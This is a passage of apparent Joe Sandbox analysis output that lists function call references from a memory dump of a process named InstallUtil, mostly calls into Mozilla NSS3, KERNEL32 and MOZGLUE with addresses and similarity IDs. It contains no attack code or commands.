                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4101233201-0
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,6C78C97F,?,?,?), ref: 6C7A04BF
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,6C78C97F,?,?,?), ref: 6C7A04F4
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C78C97F,?,?,?), ref: 6C7A050D
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C78C97F,?,?,?), ref: 6C7A0556
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 349578545-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C86A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C86A662), ref: 6C86A69E
                                                                                                                    • Part of subcall function 6C86A690: PR_NewCondVar.NSS3(?), ref: 6C86A6B4
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A8C6
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86A8EB
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A944
                                                                                                                  • PR_SetPollableEvent.NSS3(?), ref: 6C86A94F
                                                                                                                  Similarity
                                                                                                                  • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 811965633-0
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C756C8D
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C756CA9
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C756CC0
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C878FE0), ref: 6C756CFE
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2370200771-0
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C864F5D
                                                                                                                  • free.MOZGLUE(?), ref: 6C864F74
                                                                                                                  • free.MOZGLUE(?), ref: 6C864F82
                                                                                                                  • GetLastError.KERNEL32 ref: 6C864F90
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CreateErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 17951984-0
                                                                                                                  APIs
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6E36
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7C6E57
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6E7D
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6EAA
                                                                                                                  Similarity
                                                                                                                  • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3163584228-0
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,6C7B72EC), ref: 6C7B855A
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C7B72EC), ref: 6C7B859E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C7B72EC), ref: 6C7B85B8
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,6C7B72EC), ref: 6C7B8600
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1727503455-0
                                                                                                                  APIs
                                                                                                                  • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7C2896
                                                                                                                  • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7C2932
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7C294C
                                                                                                                  • free.MOZGLUE(?), ref: 6C7C2955
                                                                                                                  Similarity
                                                                                                                  • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 508480814-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C795003
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C79501C
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C79504B
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C795064
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1112172411-0
                                                                                                                  APIs
                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C7404F1
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C74053B
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C740558
                                                                                                                  • GetLastError.KERNEL32 ref: 6C74057A
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3051374878-0
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7C2E08
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400), ref: 6C7C2E1C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7C2E3B
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7C2E95
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1441289343-0
                                                                                                                  APIs
                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C77ACC2
                                                                                                                    • Part of subcall function 6C752F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C752F0A
                                                                                                                    • Part of subcall function 6C752F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C752F1D
                                                                                                                    • Part of subcall function 6C752AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C750A1B,00000000), ref: 6C752AF0
                                                                                                                    • Part of subcall function 6C752AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C752B11
                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C77AD5E
                                                                                                                    • Part of subcall function 6C7957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C75B41E,00000000,00000000,?,00000000,?,6C75B41E,00000000,00000000,00000001,?), ref: 6C7957E0
                                                                                                                    • Part of subcall function 6C7957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C795843
                                                                                                                  • CERT_DestroyCertList.NSS3(?), ref: 6C77AD36
                                                                                                                    • Part of subcall function 6C752F50: CERT_DestroyCertificate.NSS3(?), ref: 6C752F65
                                                                                                                    • Part of subcall function 6C752F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C752F83
                                                                                                                  • free.MOZGLUE(?), ref: 6C77AD4F
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132756963-0
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7924FF
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79250F
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79253C
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C792554
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 284873373-0
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C7AF0AD,6C7AF150,?,6C7AF150,?,?,?), ref: 6C7AECBA
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C7AECD1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C7AED02
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B116E
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C7AED5A
                                                                                                                  APIs
                                                                                                                  • PK11_IsLoggedIn.NSS3(?,?), ref: 6C77C890
                                                                                                                    • Part of subcall function 6C778F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FAF
                                                                                                                    • Part of subcall function 6C778F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FD1
                                                                                                                    • Part of subcall function 6C778F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C778FFA
                                                                                                                    • Part of subcall function 6C778F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779013
                                                                                                                    • Part of subcall function 6C778F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779042
                                                                                                                    • Part of subcall function 6C778F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C77905A
                                                                                                                    • Part of subcall function 6C778F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C779073
                                                                                                                    • Part of subcall function 6C778F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C76DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C779111
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C77C8B2
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C77C8D0
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77C8EB
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEDD4
                                                                                                                  • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEDFD
                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEE14
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7C9767,00000000,00000000,6C7C7FFA,?,6C7C9767,?,8B7874C0,0000A48E), ref: 6C7DEE33
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7C09B3,0000001A,?), ref: 6C7C08E9
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7C08FD
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C7C0939
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7C0953
                                                                                                                  APIs
                                                                                                                  • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C7E5F17,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FAC94
                                                                                                                  • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C7E5F17,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACA6
                                                                                                                  • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACC0
                                                                                                                  • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FACDB
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7BC5AD
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • CERT_DecodeCertPackage.NSS3(?,?,6C7BC610,?), ref: 6C7BC5C2
                                                                                                                    • Part of subcall function 6C7BC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7BC0E6
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C7BC5E0
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7BC5EF
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,?,6C7B08AA,?), ref: 6C7A88F6
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C7B08AA,?), ref: 6C7A890B
                                                                                                                  • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7B08AA,?), ref: 6C7A8936
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C7B08AA,?), ref: 6C7A8940
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 959714679-0
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C78C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C78C154,?), ref: 6C7B24FA
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,6C78C154,?), ref: 6C7B2509
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C7B2525
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B2532
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 929835568-0
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B2F88,6C7E0660,00000020,00000000,?,?,6C7E2C3D,?,00000000,00000000,?,6C7E2A28,00000060,00000001), ref: 6C7E0860
                                                                                                                    • Part of subcall function 6C6D4C70: TlsGetValue.KERNEL32(?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4C97
                                                                                                                    • Part of subcall function 6C6D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CB0
                                                                                                                    • Part of subcall function 6C6D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6D3921,6C8B14E4,6C81CC70), ref: 6C6D4CC9
                                                                                                                  • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C7E2C3D,?,00000000,00000000,?,6C7E2A28,00000060,00000001), ref: 6C7E0874
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E0884
                                                                                                                  • PR_Unlock.NSS3 ref: 6C7E08A3
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2502187247-0
                                                                                                                  APIs
                                                                                                                  • ReleaseMutex.KERNEL32(40C70845,?,6C7E4710,?,000F4240,00000000), ref: 6C7E046B
                                                                                                                  • GetLastError.KERNEL32(?,6C7E4710,?,000F4240,00000000), ref: 6C7E0479
                                                                                                                    • Part of subcall function 6C7FBF80: TlsGetValue.KERNEL32(00000000,?,6C7E461B,-00000004), ref: 6C7FC244
                                                                                                                  • PR_Unlock.NSS3(40C70845,?,6C7E4710,?,000F4240,00000000), ref: 6C7E0492
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000,?,6C7E4710,?,000F4240,00000000), ref: 6C7E04A5
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$LastMutexReleaseUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4014558462-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalDeleteSectionfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2988086103-0
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7A4D57
                                                                                                                  • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C7A4DE6
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorR_snprintf
                                                                                                                  • String ID: %d.%d
                                                                                                                  • API String ID: 2298970422-3954714993
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3('8|l,00000000,00000000,?,?,6C7C3827,?,00000000), ref: 6C7C4D0A
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7C4D22
                                                                                                                    • Part of subcall function 6C7AFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C751A3E,00000048,00000054), ref: 6C7AFD56
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                  • String ID: '8|l
                                                                                                                  • API String ID: 1521942269-4049069882
                                                                                                                  APIs
                                                                                                                  • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C7EAF78
                                                                                                                    • Part of subcall function 6C74ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74ACE2
                                                                                                                    • Part of subcall function 6C74ACC0: malloc.MOZGLUE(00000001), ref: 6C74ACEC
                                                                                                                    • Part of subcall function 6C74ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C74AD02
                                                                                                                    • Part of subcall function 6C74ACC0: TlsGetValue.KERNEL32 ref: 6C74AD3C
                                                                                                                    • Part of subcall function 6C74ACC0: calloc.MOZGLUE(00000001,?), ref: 6C74AD8C
                                                                                                                    • Part of subcall function 6C74ACC0: PR_Unlock.NSS3 ref: 6C74ADC0
                                                                                                                    • Part of subcall function 6C74ACC0: PR_Unlock.NSS3 ref: 6C74AE8C
                                                                                                                    • Part of subcall function 6C74ACC0: free.MOZGLUE(?), ref: 6C74AEAB
                                                                                                                  • memcpy.VCRUNTIME140(6C8B3084,6C8B02AC,00000090), ref: 6C7EAF94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                  • String ID: SSL
                                                                                                                  • API String ID: 2424436289-2135378647
                                                                                                                  APIs
                                                                                                                  • CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]ul,6C756499,-00000078,00000000,?,?,]ul,?,6C755DEF,?), ref: 6C75C821
                                                                                                                    • Part of subcall function 6C751DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C751E0B
                                                                                                                    • Part of subcall function 6C751DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C751E24
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]ul,?,6C755DEF,?,?,?), ref: 6C75C857
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
                                                                                                                  • String ID: ]ul
                                                                                                                  • API String ID: 221937774-1500978261
                                                                                                                  APIs
                                                                                                                  • PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C741370: GetSystemInfo.KERNEL32(?,?,?,?,6C740936,?,6C740F20,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000), ref: 6C74138F
                                                                                                                  • PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                    • Part of subcall function 6C741110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C740936,00000001,00000040), ref: 6C741130
                                                                                                                    • Part of subcall function 6C741110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C740936,00000001,00000040), ref: 6C741142
                                                                                                                    • Part of subcall function 6C741110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C740936,00000001), ref: 6C741167
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                  • String ID: clock
                                                                                                                  • API String ID: 536403800-3195780754
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3339632435-0
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C70A468,00000000), ref: 6C70A4F9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C70A468,00000000), ref: 6C70A51B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C70A468,?,6C70A468,00000000), ref: 6C70A545
                                                                                                                  • memcpy.VCRUNTIME140(00000001,6C70A468,00000001,?,?,?,6C70A468,00000000), ref: 6C70A57D
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3396830738-0
                                                                                                                  APIs
